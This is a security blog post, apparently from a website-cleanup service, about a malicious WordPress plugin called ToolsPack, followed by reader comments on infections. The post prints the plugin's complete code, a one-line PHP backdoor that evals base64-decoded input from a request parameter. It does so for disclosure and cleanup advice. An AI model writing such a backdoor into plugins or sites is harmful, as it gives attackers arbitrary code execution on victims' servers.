New WordPress ToolsPack Plugin

We deal with many compromised sites daily and lately we are seeing something in common across many of the sites running WordPress.

They have installed a plugin called ToolsPack (./wp-content/plugins/ToolsPack/ToolsPack.php), which according to the author will “Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!”

Interesting…

However, when we look at the plugin code, all it does is this:

<?php
/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
?>

If you are not familiar with PHP, this is just a backdoor: it takes whatever is sent in the `e` request parameter, base64-decodes it and runs it as PHP, so anyone who knows the parameter name can execute arbitrary code on your site. If you see this plugin installed on your system, remove it right away!

How this plugin got in there is a different question. On some of the compromised websites we noticed it was installed through wp-admin (so stolen passwords), and on others it was installed via another backdoor.

Removing this plugin alone is unlikely to solve your security issues. You have to do a full review of the website: check all your files, update WordPress, change passwords, etc.

Have you seen this plugin, or something like it? Make sure to leave a comment with your experience.


37 comments
  1. I found this plugin on one of my sites on 2/13. It appears to have gotten installed over the weekend. I found that the plugin was executed twice over the weekend. index.php in the root folder along with the wp-content folder had been altered to include a malware script related to JS/Blacole.BV. I have not found any other altered files.

    1. This sounds like what I went through about 2 weeks ago. It attacked all index files with a chunk of malicious code. I was told it was attached to the shell on a WP install. It executed twice over the same weekend Bob mentioned. That particular WP site was one page; it was on hold for a client who had stopped the project. After I cleaned up the malware, I canned all wp files. I didn’t bother to check the plugins page before doing this.

  2. Hello, be careful, this thing attacks all index.php/html/html files and adds a few lines of another malware there.

  3. My client’s site was hacked yesterday and I am now removing the malware code from it.
    Should I directly delete the plugin files and uninstall it via wp-admin?

  4. Yep, just removed this plugin and the code it added to all my index.php files. The IP address of the attacker was 83.69.224.227, Russia… So angry, I have cleaned this site 5 times now, and Google has blacklisted it too. I have just installed a block-country plugin… all of Russia is now blocked…

  5. Thanks for this, I had no idea what was going on.
    I’m a little new to this; how do I clean up this malware properly? I’ve deleted the toolspack folder which was in the plugins folder, reinstalled WordPress and changed all the passwords.

  6. I found p_music_player beside the ToolsPack in some of my clients’ websites. I checked where the attacker came from. He didn’t make any exploit attack. He used tools to find any WordPress website with the user admin:admin or maybe another weak password. So change your weak password.

  7. Backdoor attacks have been coming in for the past 7 days. This effer indeed left a backdoor. Thankfully, I had them sealed. Those struck in February, be on the lookout!

  8. I’ve seen this plugin several times. In most of the cases I’ve seen, the WordPress site was “hacked” because of weak admin account credentials, thus the user was able to upload such a plugin. Quite smart!
